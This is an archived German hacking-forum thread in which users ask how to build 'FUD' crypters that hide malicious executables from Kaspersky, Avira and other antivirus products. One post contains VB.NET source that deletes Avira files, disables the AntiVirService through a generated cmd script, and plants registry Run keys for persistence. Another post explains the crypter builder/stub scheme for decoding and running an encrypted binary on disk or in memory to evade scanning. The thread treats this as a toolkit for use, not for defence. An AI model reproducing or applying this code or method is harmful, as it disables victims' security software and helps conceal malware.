PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] (F)UD Crypter (V)TuT



Fuyo
27.07.2009, 18:57
Liebes Forum ,
ich suche seit gewisser Zeit ein Tutorial ,
wo erklärt wird , die man z.B in vb einen FUD oder Runtime UD und Scantime UD Crypter
programmiert .

Am besten wäre ein VTuT ...

Werde mich über schnelle antworten freuen

lg Fuyo

Gargarensis
27.07.2009, 19:03
---> sufu ,... da gibts n tut: How to Crypter proggen oder so in VB,... schau da mal

Placekeeper
27.07.2009, 19:04
Daran wäre ich auch sehr interessiert. Das müsste dann sicher aber ein MEGA tut sein. Nach PMen und chatten mit mehreren Leuten zeigte sich das da schon einiges an Arbeit und Komplexität hinter stecken.

Wäre aber auch sehr dankbar wenn sich jemand mal die Arbeit machen würde bzw ein solches TUT kennt und es reinstellt....

danke schonmal

Fuyo
27.07.2009, 19:05
Mir würd eigentlich auch schon ein TuT reichen , wo scantime UD und runtime UD erklärt wird , und vllt wie man Kaspersky und Antivir und noch 1-2 weitere VirenSoftwares "downkrieg" oder "verarscht"

Gargarensis
28.07.2009, 21:33
da sich hier ja sonst niemand die mühe macht die sufu zu benutzen,...

http://free-hack.com/showthread.php?t=35963&highlight=Crypter+Coden

Ich find das TuT klasse =)

Fetzi
28.07.2009, 22:20
@fuyo

es gab mal ein kleines programm im diesen forum hab die source noch aber weiß net von wen es war ... naja thx an den ersteller des progs ^^(au wenn mir der name grad nicht einfällt ...)
das ganze ist dazu da um antivir außer gefecht zusetzen




Imports System.IO ' wird für den streamwriter benötigt
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

'versucht die .dlls im avira ordner zu löschen
Try
IO.File.Delete(Environment.SpecialFolder.Programs & "\avira\antivir desktop\" & "\*.dll*")
Application.DoEvents()
Catch ex As Exception

End Try
Try
'Versucht den Ordner Avira zu löschen
IO.Directory.Delete(Environment.SpecialFolder.Prog rams & "\avira")
Application.DoEvents()
Catch ex As Exception

End Try
'erstellt ne cmd im ordner tmp um den Antirservice zu killen klappt aufjedenfall nach dem neustart des systems
Try
Dim swriter = New StreamWriter(Environ("tmp") & "\avira.cmd")
swriter.WriteLine("@echo off")
swriter.WriteLine("sc.exe config AntiVirService start= disabled")
swriter.Close()
'startet die avira.cmd
Process.Start(Environ("tmp") & "\avira.cm")
Catch ex As Exception

End Try
'macht einen registry eintrag für den autostart der avira.cmd
Try
Dim regpfad As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regname As String = "AVFuck"
Dim filepfad As String = Environ("tmp") & "\avira.cmd"

My.Computer.Registry.SetValue(regpfad, regname, filepfad, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception
End Try
Try
'Löscht den eintrag für das trayicon von avira
My.Computer.Registry.SetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run", "avira", "", _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
'schreibt einen registry autostart eintrag für die anwendung
Try
Dim regpfaddatei As String = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run"
Dim regnamedatei As String = "AVFuckstarter"
Dim filepfaddatei As String = Application.ExecutablePath

My.Computer.Registry.SetValue(regpfaddatei, regnamedatei, filepfaddatei, _
Microsoft.Win32.RegistryValueKind.String)
Catch ex As Exception

End Try
End
End Sub
End Class



nunja mfg und bla

Fuyo
29.07.2009, 09:37
Ok danke für die Source , aber was soll ich jetzt genau damit anfangen .
Da er in VB gecodet ist hab ich in mir mal angeguckt , ich hab zwar den source aber fehlt da nicht noch iwie ein Feld wo
ich die zu cryptende datei einfüge ?
und irgendwie ist die Form blanc , bitte um hilfe
Trotzdem danke

sarex
29.07.2009, 09:39
ich würd ma sagen vb
oder ganz sicher vb
wenn ich falsch liege bin für jede berichtigung dankbar =)

LeadOr
29.07.2009, 09:42
vb.net und das versucht jnur avira zu löschen, während es läuft.

IRET
29.07.2009, 09:53
Ein Crypter cryptet(wie der Name schon sagt) den Inhalt einer .exe(Binary)
Also auf Deutsch.
Du hast einen Algorythmus der Bytes encodet.
Der ist in deinen Builder.
Und dann hast du das Gegenstück vom Algo der die wieder decodet.
Das ist in der stub.
Also wird im Builder die Binary eingelesen ,encodet und zur Stub hinzugefügt.
In der fertigen Datei werden die gecrypteten bytes decodet und auf der Festplatte wieder zusammen gesetzt.
Das ist Scantime.
Runtime würde er die Bytes nicht auf der Festplatte zusammensetzten sonder direckt im Speicher.
Jetzt beschäftigst du dich am besten mit Verschlüsselungen ,da du keinen fertigen verwenden kannst(nicht FUD).
Ich habe da nur das Prinzip das ich interpretiere/denke beschrieben.
Könnte sein ,dass die Crypter ganz anders funktionieren ,aber so mache ich das^^
Also Zusammenfassung:
-Binary wird eingelsen
-Bytes werden encodet und an Stub übergeben
-Stub decodet die Bytes und setzt sie auf der Festplatte/im Speicher zusammen und führt sie aus.

Hoffe das beantwortet deine Frage.

PS:Bin für alle Einwände offen ;)

Fuyo
29.07.2009, 09:56
Danke für die guten antworten , werde es versuchen